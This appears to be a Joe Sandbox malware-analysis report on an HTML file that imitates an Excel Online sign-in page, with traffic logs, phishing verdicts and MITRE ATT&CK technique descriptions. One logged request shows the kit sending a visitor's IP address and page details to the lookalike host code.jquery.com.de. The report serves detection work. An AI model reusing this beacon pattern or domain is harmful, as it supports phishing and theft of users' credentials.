Source: global traffic	HTTP traffic detected: GET /office.com HTTP/1.1Host: logo.clearbit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /post/index.php?title=Excel%20Online%20Spreadsheet%20::%20Sign%20in&link=file:///C:/Users/user/Desktop/aaaaa.shtml.html&time=2024-6-20%2012:14:14&ip=8.46.123.33%20:%20United%20States HTTP/1.1Host: code.jquery.com.deConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vS6KOkeB56FzUt4&MD=+M+DVe1e HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /sls/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vS6KOkeB56FzUt4&MD=+M+DVe1e HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vS6KOkeB56FzUt4&MD=+M+DVe1e HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: global traffic	DNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
Source: global traffic	DNS traffic detected: DNS query: ucarecdn.com
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com.de
Source: global traffic	DNS traffic detected: DNS query: logo.clearbit.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa

Source: file:///C:/Users/user/Desktop/aaaaa.shtml.html	LLM: Score: 9 brands: Microsoft Excel Reasons: The URL 'file:///C:/Users/user/Desktop/aaaaa.shtml.html' is a local file path, not a legitimate web domain, which is highly suspicious. The page mimics Microsoft Excel Online, a service provided by Microsoft, whose legitimate domain is 'office.com'. The presence of a login form asking for an email password is a common phishing technique. The 'Download Document' button is another suspicious element as it could lead to malicious downloads. The combination of these factors strongly indicates that this is a phishing site. DOM: 0.0.pages.csv
Source: file:///C:/Users/user/Desktop/aaaaa.shtml.html	LLM: Score: 9 brands: Microsoft Reasons: The URL 'file:///C:/Users/user/Desktop/aaaaa.shtml.html' is a local file path, which is highly suspicious for a legitimate web page. The page mimics Microsoft Excel Online, a service provided by Microsoft, but the URL does not match the legitimate domain 'microsoft.com'. The presence of a login form asking for an email password is a common phishing technique. The page also uses social engineering techniques by presenting a familiar brand interface to mislead users. The combination of these factors strongly indicates that this is a phishing site. DOM: 0.1.pages.csv

Source: file:///C:/Users/user/Desktop/aaaaa.shtml.html	Matcher: Template: excel matched
Source: file:///C:/Users/user/Desktop/aaaaa.shtml.html	Matcher: Template: excel matched

Source: aaaaa.shtml.html	HTTP Parser: Number of links: 0
Source: file:///C:/Users/user/Desktop/aaaaa.shtml.html	HTTP Parser: Number of links: 0

Source: aaaaa.shtml.html	HTTP Parser: Title: Excel Online Spreadsheet :: Sign in does not match URL
Source: file:///C:/Users/user/Desktop/aaaaa.shtml.html	HTTP Parser: Title: Excel Online Spreadsheet :: Sign in does not match URL

Source: file:///C:/Users/user/Desktop/aaaaa.shtml.html	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/aaaaa.shtml.html	HTTP Parser: No favicon

Source: aaaaa.shtml.html	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/aaaaa.shtml.html	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/aaaaa.shtml.html	HTTP Parser: No <meta name="author".. found

Source: aaaaa.shtml.html	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/aaaaa.shtml.html	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/aaaaa.shtml.html	HTTP Parser: No <meta name="copyright".. found

Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report aaaaa.shtml.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

HTML

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Boot Survival

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 100

Chrome Cache Entry: 101

Chrome Cache Entry: 102

Chrome Cache Entry: 96

Chrome Cache Entry: 97

Chrome Cache Entry: 98

Chrome Cache Entry: 99

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Windows Analysis Report
aaaaa.shtml.html